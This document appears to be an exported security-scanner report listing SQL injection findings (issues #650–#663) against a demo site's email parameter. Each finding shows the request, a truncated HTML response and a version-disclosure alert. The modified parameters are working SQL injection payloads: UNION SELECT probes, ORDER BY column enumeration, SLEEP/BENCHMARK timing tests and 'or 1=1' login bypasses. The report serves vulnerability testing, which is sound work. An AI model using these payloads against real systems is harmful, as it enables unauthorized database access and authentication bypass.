content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #650Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #651\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io '%20o/**/r%201/0%20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #652\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #653\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #654\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),3--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #655\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin') or '1'='1'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #656\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARKdeepfence.io (1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #657\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #658\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #659\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 8--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #660\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io&&SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #661Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\") or \"1\"=\"1\"#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #662\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #663\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 